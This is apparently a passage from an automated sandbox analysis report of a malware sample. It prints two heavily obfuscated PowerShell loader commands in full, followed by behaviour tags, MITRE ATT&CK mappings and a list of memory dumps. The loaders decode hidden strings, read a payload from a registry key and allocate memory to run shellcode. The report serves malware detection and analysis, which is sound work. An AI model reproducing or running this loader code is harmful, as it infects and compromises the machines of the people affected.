RoEUnkDesPrpGuoMerPrtasrOv0sp Ma'Ke0zyBno7IsAFi4St1Ri4Se3Be4coEFo4ex6Fe4StBSp1noCPr0BlFDe1St2hn0KaFEr0ImBBi6SyEec4siBTi4Ma2Fo4Pa6Re4Ic1Su4Me6Sc5PaCho5PrBCh5VeDUn4MeEPr5ReBob4Se6Ke4Br0Op4Jr1Vr5BaCMe4SeCEl4Dy7Re4InAAn4Un9Ud4UdABj5BoDNa0Br1Un6De6Fo4In1Sk5Da9Of4Re0Na4Si4Ga4PrARr0Er7Un7Pr4me6So6Cl4Ch1Br5PeBEa7EnFRe5DiBDe5LuDBr7Fl2di1Co5Re1Re5Ge7Bo5Fo4ScACh5LeDAf4Di0Sl0Lf3No0voFDe1UnCIn1GaASp1FoBMo0Ud3Fl0deFKi1OvFca5ge7So1inCac1EnFCl1HoFAl1ApFAf0Hi3Ho0ArFAl1NiFTr5Kl7Pr1PsBFe1ToFJa0Bl6Pi'Do;Fo&Fr(Di`$GrRGedgamSkaAclEfecetSt7Un)Sp Ve`$CosTrtAfrCoaGufBg7Ep;Un`$MesTetAmrEnaPrfHo8Po Pr=Ge SuEPakFosinpDaoPyrGutUnrRe0Oo Sp'Pa0ArBBo7sjDSn4VaAFl4Sn2Us4AkEOx5NsCHa5ovCAf0BiFSv1Om2Ne0UnFPo0TiBLe6aaEUd4DeBEl4Se2Aa4sn6At4Bj1Sk4de6sa5SrCMy5IdBOp5SaDMo4PrESt5faBMe4st6Ud4No0An4Tr1Ga5AuCGr4FiCsk4Me7ju4SeASk4Ek9Re4RdABu5DrDDi0Mu1So6Pe6Sa4Sk1Er5De9Co4Ag0Sa4Br4Ne4AuAra0Ma7Sy7ve4re6Aa6Hj4Te1lt5ToBCu7SnFEm5OvBSp5TeDKo7Un2Pi1Ep5Ex1Or5Ab7Af5Na4EnASh5EpDSe4st0Mi0Th3St0KeFBe1AcFFo5re7Ni1UnENa1ScFTr1ElFGr1OvFKl1MyFOv1PiFAm0Th3ti0faFRo1SaFal5Fr7Ce1SaCCi1AnFEi1naFCa1JoFsl0Ja3Ca0ViFFa1NaFSl5pa7Re1SrBBa0De6Di'Sn;Fd&Ba(Sn`$HeROvdTumApavolHaeTrtKo7po)Im Rm`$ChsPrtHurdyaSkfTr8Ap;op`$BrDPriPrfCatlaoMunSmgHveDerHoeZonDadEmeOu=Bo(SkGReeAmtre-DeISetSpeNomBoPFjrEmoSepBreLerlitAfySv Ba-TePLsaintgehTy Ed'TaHUnKBaCkoUPr:Po\IrDHyySknaraScsSptUniMieSesGy\SuMutiNekAnsdieEqrAfeFo'St)Af.EnGMiaMoiDatCoiDenStgMy;Wo`$busRetStrStaOcfUd9ja Un=Fe boEBrkOpslipLaoRarSttBrrco0Jo He'Pa0RnBKi5nyCSv5OrBAn5SaDCa4SeEfr4An9Ba0RiFGi1Ba2Ar0DrFAu7Na4Br7MoCSk5Ko6Pa5MiCVa5UaBFo4RhAVe4Tr2Ko0Cr1Ob6KoCSa4No0En4Sp1Fo5Lb9sp4AgAWa5LaDFl5AnBIr7St2Om1Di5Co1Va5Te6Up9Ch5LaDDi4Be0He4Ta2Co6UnDMa4CiELi5InCAr4NoAUn1Ar9Ka1CiBNa7fuCKu5ExBox5mbDSl4Kn6Re4Gy1Re4Bu8Mb0Re7Ho0BrBBl6TiBSe4Fo6Sa4Bl9Is5HaBGe4Ta0Sa4Do1Be4La8By4suAFa5UnDim4DoAFe4Pi1Be4StBCl4JaAOf0Un6Fo'Ho;Sa&Cr(Ko`$PaRWidMemLiaKalReeVrtKi7Pr)Te Ne`$RisTutHyrTraSlfSh9Tr;De`$SiDNoiMafKvtUpoSinOlgBeevarUdeinnSkdFieEn0De Be=Ph KuEdekovsAtpAnoatrFltFrrKu0sp Ha'Si7Su4Ca7GaCSe5Sk6Ge5GaCFo5TaBVa4PeAMu4Sk2Ki0In1In7KrDPa5InAso4Va1Br5ErBCo4Do6hj4Em2Ri4PrABa0Hi1Sp6De6As4sc1Sk5EnBAf4CaAWo5StDCa4No0Mo5SaFUn7RaCEf4HoAla5RaDKo5Po9De4Ka6Er4MuCBa4AhASu5CrCCo0Ba1El6Fj2Pr4HgESk5ToDPr5PaCRe4Wa7Bu4AnEpr4Pr3Un7Sl2Le1Ni5Pa1la5Me6meCAn4Pe0Br5VeFSo5Dy6Cy0Ps7of0StBEq5DuCSt5PaBSk5OtDKr4AfEDe4Fr9Un0Be3sk0PrFNa1TjFTe0To3Su0BwFFl0VaFra0BrBKa7WhANu4Dy1Fo4Fa3Gr4VoETy4Ka6sa4FiBDr1KrCov0Ue3te0FrFDr1tvCSk1hyAUd1SjBMe0In6Ap'Ra;Su&Ca(Ud`$GyRGodTrmReaWalBueDitDy7Ca)Gg Mi`$FoDReiSwfHetUnoEtnTrgTreNorBjeLenNedAmeSt0Ov;Bu`$BlHHeaDrlBavSveMorAveLotKi=Ra`$SksCrtPlrUdaTeftr.PucScoKiuPantatSy-Ne3An5Fa4Sp;Au`$ThDpsiUnfSytHaoHonFegHueTrrBaeUnnpodpaemi1hu Al=Im FoEDokObsKvpfroArrEltsurWa0An Fa'Sa7Tu4Mi7SaCBo5Co6Ha5StCAs5NoBvi4SeATr4En2Pi0Vi1Ni7DiDCa5ceACr4Fo1de5UnBEn4Ni6Ap4as2Re4UnAUn0Un1La6Ko6Ch4Sn1Tu5WeBIn4BrACa5HyDMe4Vi0Fo5KrFRe7GrCAm4ObABl5StDUn5Op9Sr4Ve6Ko4EtCCa4StAPu5NoCRu0Su1fe6Gr2Ge4GlERe5HyDPr5EfCGr4Ob7Fo4BeEBn4Af3As7Re2Al1Ev5Af1An5No6kaCPe4Br0Ef5OvFSu5Vo6li0Gr7In0ViBHe5FoCTa5krBco5KaDUn4ToEMy4Ko9Sp0Cl3Un0BoFNr1toCUf1AxASo1AcBkn0Re3Pr0CiFFu0ReBre7PiDMi4trAHi4Fl2No4FoEIt5ArCwa5MoCRo0Fr3So0PrFhy0OvBLo6Co7Le4SpELo4St3Ev5Re9So4AfAdi5PoDun4AwAco5MiBTh0Ra6Pr'In;uh&Mu(Ev`$InRFidSkmFaarelSpeFatIn7Re)Ty Ge`$CaDeliSofHitVeoMenFigUbeInromeUnnMadGreSy1Ar;St`$SlDDiiThfNotBuoLpnChgFoeStrMueArnBadUdeLu2Ov Ev=Al BoESakElsfrpHaoKarBytFrrOv0Su Ha'Py0FrBBe6SlDAw5FrDAg4Ex6La4BaABi4Gr9La4Ak3Al4ErAUn5FoCUn5ReCJe4Ad1Em4UnABy5NaCSw5SaCsu0fuFCa1Pe2Mo0HuFCi7Al4Ha7FoCVa5Me6Em5PrCTr5UrBPa4ArADo4Me2Sp0de1Ta7CiDMo5AgAKe4Un1Kb5arBSa4no6Ga4Un2He4FoAFu0Ti1co6Mo6Su4ea1Hy5SeBvr4FjAHv5AcDPh4Be0Un5KaFWi7GrCSu4PyAGi5WoDHa5Cl9Mu4Fa6eu4GnCBy4ExAre5OvCaz0Me1Pr6Vo2To4JaENr5CoDDy5BaCAf4Ti7ov4BeESp4Ba3Ce7Ve2Do1Su5Ku1Be5Na6Un8In4MuATo5MaBKa6HoBAk4SkAre4Be3St4exASv4Sy8Ak4AkEFl5DaBAr4BeALb6Un9Mo4Za0Ka5PrDFi6Xi9Ch5foAPr4An1Re4BlCFi5KnBFl4As6Sm4Bi0Fr4Re1Ud7StFRe4In0He4Si6No4Pa1Un5BrBTy4snAMe5pnDEm0Ye7Kl0ReBPr7DiASp4Da1No4Ud3Ho4SiEMi4Di6Es4ReBBr1SaCou0op3Ge0InFSk0Or7Ls6Sk8Fr6OvBLi7BaBFo0stFPr6CoFFo0Fn7Br7Gl4No6Re6Le4Ja1Ci5FoBFo7LiFTr5NoBGe5TiDFo7Sk2At0Ca3ve7Ha4Ga6Ni6pa4Sa1Ub5EfBMe7TrFEn5KaBSl5gkDIn7Ta2Ri0Ta6Rh0SpFOv0Sa7Au7Xi4Al7Sk9Vi4Ko0Va4ba6Re4ScBEt7Sp2Te0Ek6Di0Sm6me0Ou6Ra'Bo;Ba&Ba(Wy`$SlRSodcymNiaRelDieEmtPa7Tr)Ca un`$HaDBeiSafPotSmoLunUngSueSyrDaeninHadRoeRa2Ho;Bl`$kaDMoiDifantUdoShnMagSueStrNyeMnnendCoeBa3Un Fo=Pa UdEirkSpsStpEroSarSptKlrNo0Pa En'Us0OrBot6OvDFr5KoDBa4Me6Tu4FlASu4Fl9Ti4Sk3Sl4AbAPo5OuCEn5ToCEs4Ka1Le4AnADa5SaCMe5JeCDe0Pe1El6Li6Un4Wh1He5Ha9Ov4Sp0Bi4Re4Ch4CeACo0Ta7Do0SkBIn7CoDFi4FlAHa4Eo2To4KuEJo5DdCMe5FuCDe0Ba3Vi0smBTr7ToCTo4An0Fu5NeABl5ClDIm4Re7St4TaAFo4AnETh5AnDKi5FaBUn4DeAfa4adBar0Fl6Wo'Fe;Fa&Jo(Li`$SeRSvdMampraRilloeNotHu7An)As Um`$TiDHeifofKotAroDinSigAeeDervaeRunSpdSheSa3rk#An;""";;Function Diftongerende9 { param([String]$Fyrretyve); For($Preauditory=2; $Preauditory -lt $Fyrretyve.Length-1; $Preauditory+=(2+1)){ $Eksportr = $Eksportr + $Fyrretyve.Substring($Preauditory, 1); } $Eksportr;}$Waspily0 = Diftongerende9 'CaIBuESuXFo ';$Waspily1= Diftongerende9 $Pajonism;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Waspily1 ;}else{.$Waspily0 $Waspily1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Eksportr0 { param([String]$Fyrretyve); $Demodectic = New-Object byte[] ($Fyrretyve.Length / 2); For($Preauditory=0; $Preauditory -lt $Fyrretyve.Length; $Preauditory+=2){ $Demodectic[$Preauditory/2] = [convert]::ToByte($Fyrretyve.Substring($Preauditory, 2), 16); $Demodectic[$Preauditory/2] = ($Demodectic[$Preauditory/2] -bxor 47); } [String][System.Text.Encoding]::ASCII.GetString($Demodectic);}$Unturfed0=Eksportr0 '7C565C5B4A42014B4343';$Unturfed1=Eksportr0 '62464C5D405C40495B017846411C1D017A415C4E494A614E5B46594A624A5B47404B5C';$Unturfed2=Eksportr0 '684A5B7F5D404C6E4B4B5D4A5C5C';$Unturfed3=Eksportr0 '7C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01674E414B434A7D4A49';$Unturfed4=Eksportr0 '5C5B5D464148';$Unturfed5=Eksportr0 '684A5B62404B5A434A674E414B434A';$Unturfed6=Eksportr0 '7D7B7C5F4A4C464E43614E424A030F67464B4A6D567C4648030F7F5A4D43464C';$Unturfed7=Eksportr0 '7D5A415B46424A030F624E414E484A4B';$Unturfed8=Eksportr0 '7D4A49434A4C5B4A4B6B4A434A484E5B4A';$Unturfed9=Eksportr0 '6641624A42405D5662404B5A434A';$Rdmalet0=Eksportr0 '62566B4A434A484E5B4A7B565F4A';$Rdmalet1=Eksportr0 '6C434E5C5C030F7F5A4D43464C030F7C4A4E434A4B030F6E415C466C434E5C5C030F6E5A5B406C434E5C5C';$Rdmalet2=Eksportr0 '66415940444A';$Rdmalet3=Eksportr0 '7F5A4D43464C030F67464B4A6D567C4648030F614A587C43405B030F79465D5B5A4E43';$Rdmalet4=Eksportr0 '79465D5B5A4E436E4343404C';$Rdmalet5=Eksportr0 '415B4B4343';$Rdmalet6=Eksportr0 '615B7F5D405B4A4C5B79465D5B5A4E43624A42405D56';$Rdmalet7=Eksportr0 '666A77';$Rdmalet8=Eksportr0 '73';function fkp {Param ($Unrealizables, $Idemnd247) ;$straf0 =Eksportr0 '0B624A4A5D5C4C474E5A425C0F120F07746E5F5F6B40424E46417215156C5A5D5D4A415B6B40424E464101684A5B6E5C5C4A424D43464A5C07060F530F78474A5D4A02604D454A4C5B0F540F0B70016843404D4E436E5C5C4A424D43566C4E4C474A0F026E414B0F0B700163404C4E5B464041017C5F43465B070B7D4B424E434A5B170674021E72016A5E5A4E435C070B7A415B5A5D494A4B1F060F520601684A5B7B565F4A070B7A415B5A5D494A4B1E06';&($Rdmalet7) $straf0;$straf5 = Eksportr0 '0B605F424E484E5C46414A5D4641484A5D0F120F0B624A4A5D5C4C474E5A425C01684A5B624A5B47404B070B7A415B5A5D494A4B1D030F747B565F4A7472720F6F070B7A415B5A5D494A4B1C030F0B7A415B5A5D494A4B1B0606';&($Rdmalet7) $straf5;$straf1 = Eksportr0 '5D4A5B5A5D410F0B605F424E484E5C46414A5D4641484A5D0166415940444A070B415A4343030F6F07747C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01674E414B434A7D4A497207614A5802604D454A4C5B0F7C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01674E414B434A7D4A490707614A5802604D454A4C5B0F66415B7F5B5D06030F070B624A4A5D5C4C474E5A425C01684A5B624A5B47404B070B7A415B5A5D494A4B1A06060166415940444A070B415A4343030F6F070B7A415D4A4E4346554E4D434A5C06060606030F0B664B4A42414B1D1B180606';&($Rdmalet7) $straf1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $herborizing,[Parameter(Position = 1)] [Type] $Condecent = [Void]);$straf2 = Eksportr0 '0B7F474E484A4B4A41464C4E430F120F746E5F5F6B40424E46417215156C5A5D5D4A415B6B40424E4641016B4A4946414A6B56414E42464C6E5C5C4A424D43560707614A5802604D454A4C5B0F7C565C5B4A42017D4A49434A4C5B464041016E5C5C4A424D4356614E424A070B7A415B5A5D494A4B170606030F747C565C5B4A42017D4A49434A4C5B464041016A42465B016E5C5C4A424D43566D5A46434B4A5D6E4C4C4A5C5C7215157D5A4106016B4A4946414A6B56414E42464C62404B5A434A070B7A415B5A5D494A4B16030F0B494E435C4A06016B4A4946414A7B565F4A070B7D4B424E434A5B1F030F0B7D4B424E434A5B1E030F747C565C5B4A4201625A435B464C4E5C5B6B4A434A484E5B4A7206';&($Rdmalet7) $straf2;$straf3 = Eksportr0 '0B7F474E484A4B4A41464C4E43016B4A4946414A6C40415C5B5D5A4C5B405D070B7A415B5A5D494A4B19030F747C565C5B4A42017D4A49434A4C5B464041016C4E43434641486C4041594A415B4640415C7215157C5B4E414B4E5D4B030F0B474A5D4D405D465546414806017C4A5B66425F434A424A415B4E5B46404169434E485C070B7A415B5A5D494A4B1806';&($Rdmalet7) $straf3;$straf4 = Eksportr0 '0B7F474E484A4B4A41464C4E43016B4A4946414A624A5B47404B070B7D4B424E434A5B1D030F0B7D4B424E434A5B1C030F0B6C40414B4A4C4A415B030F0B474A5D4D405D465546414806017C4A5B66425F434A424A415B4E5B46404169434E485C070B7A415B5A5D494A4B1806';&($Rdmalet7) $straf4;$straf5 = Eksportr0 '5D4A5B5A5D410F0B7F474E484A4B4A41464C4E43016C5D4A4E5B4A7B565F4A0706';&($Rdmalet7) $straf5 ;}$Linage = Eksportr0 '444A5D414A431C1D';$straf6 = Eksportr0 '0B6E4B424641465C5B5D4E5B4640415C4C474A494A5D0F120F747C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01624E5D5C474E43721515684A5B6B4A434A484E5B4A69405D695A414C5B4640417F4046415B4A5D070749445F0F0B6346414E484A0F0B7D4B424E434A5B1B06030F07686B7B0F6F077466415B7F5B5D72030F747A66415B1C1D72030F747A66415B1C1D72030F747A66415B1C1D72060F077466415B7F5B5D72060606';&($Rdmalet7) $straf6;$Sourhearted = fkp $Rdmalet5 $Rdmalet6;$straf7 = Eksportr0 '0B7A41434E464B1C0F120F0B6E4B424641465C5B5D4E5B4640415C4C474A494A5D0166415940444A077466415B7F5B5D721515754A5D40030F1C1A1B030F1F571C1F1F1F030F1F571B1F06';&($Rdmalet7) $straf7;$straf8 = Eksportr0 '0B7D4A424E5C5C0F120F0B6E4B424641465C5B5D4E5B4640415C4C474A494A5D0166415940444A077466415B7F5B5D721515754A5D40030F1F571E1F1F1F1F1F030F1F571C1F1F1F030F1F571B06';&($Rdmalet7) $straf8;$Diftongerende=(Get-ItemProperty -Path 'HKCU:\Dynasties\Miksere').Gaiting;$straf9 = Eksportr0 '0B5C5B5D4E490F120F747C565C5B4A42016C4041594A5D5B721515695D40426D4E5C4A191B7C5B5D464148070B6B46495B4041484A5D4A414B4A06';&($Rdmalet7) $straf9;$Diftongerende0 = Eksportr0 '747C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01624E5D5C474E437215156C405F56070B5C5B5D4E49030F1F030F0F0B7A41434E464B1C030F1C1A1B06';&($Rdmalet7) $Diftongerende0;$Halveret=$straf.count-354;$Diftongerende1 = Eksportr0 '747C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01624E5D5C474E437215156C405F56070B5C5B5D4E49030F1C1A1B030F0B7D4A424E5C5C030F0B674E43594A5D4A5B06';&($Rdmalet7) $Diftongerende1;$Diftongerende2 = Eksportr0 '0B6D5D464A49434A5C5C414A5C5C0F120F747C565C5B4A42017D5A415B46424A0166415B4A5D405F7C4A5D59464C4A5C01624E5D5C474E43721515684A5B6B4A434A484E5B4A69405D695A414C5B4640417F4046415B4A5D070B7A41434E464B1C030F07686B7B0F6F077466415B7F5B5D72037466415B7F5B5D72060F07747940464B72060606';&($Rdmalet7) $Diftongerende2;$Diftongerende3 = Eksportr0 '0B6D5D464A49434A5C5C414A5C5C0166415940444A070B7D4A424E5C5C030B7C405A5D474A4E5D5B4A4B06';&($Rdmalet7) $Diftongerende3#"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4664

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2228-133-0x0000000000000000-mapping.dmp

Download
memory/2228-134-0x0000014A36A40000-0x0000014A36A62000-memory.dmp

Filesize
136KB

Download
memory/2228-135-0x00007FFB75410000-0x00007FFB75ED1000-memory.dmp

Filesize
10.8MB

Download
memory/2228-143-0x00007FFB75410000-0x00007FFB75ED1000-memory.dmp

Filesize
10.8MB

Download
memory/4664-141-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/4664-144-0x0000000007CF0000-0x000000000836A000-memory.dmp

Filesize
6.5MB

Download
memory/4664-139-0x00000000054E0000-0x0000000005502000-memory.dmp

Filesize
136KB

Download
memory/4664-140-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/4664-137-0x0000000002A90000-0x0000000002AC6000-memory.dmp

Filesize
216KB

Download
memory/4664-142-0x0000000005100000-0x000000000511E000-memory.dmp

Filesize
120KB

Download
memory/4664-136-0x0000000000000000-mapping.dmp

Download
memory/4664-138-0x0000000005510000-0x0000000005B38000-memory.dmp

Filesize
6.2MB

Download
memory/4664-145-0x0000000006900000-0x000000000691A000-memory.dmp

Filesize
104KB

Download
memory/4664-146-0x0000000007770000-0x0000000007806000-memory.dmp

Filesize
600KB

Download
memory/4664-147-0x00000000075B0000-0x00000000075D2000-memory.dmp

Filesize
136KB

Download
memory/4664-148-0x0000000008920000-0x0000000008EC4000-memory.dmp

Filesize
5.6MB

Download
memory/4664-150-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download
memory/4664-151-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download

Analysis

Sharing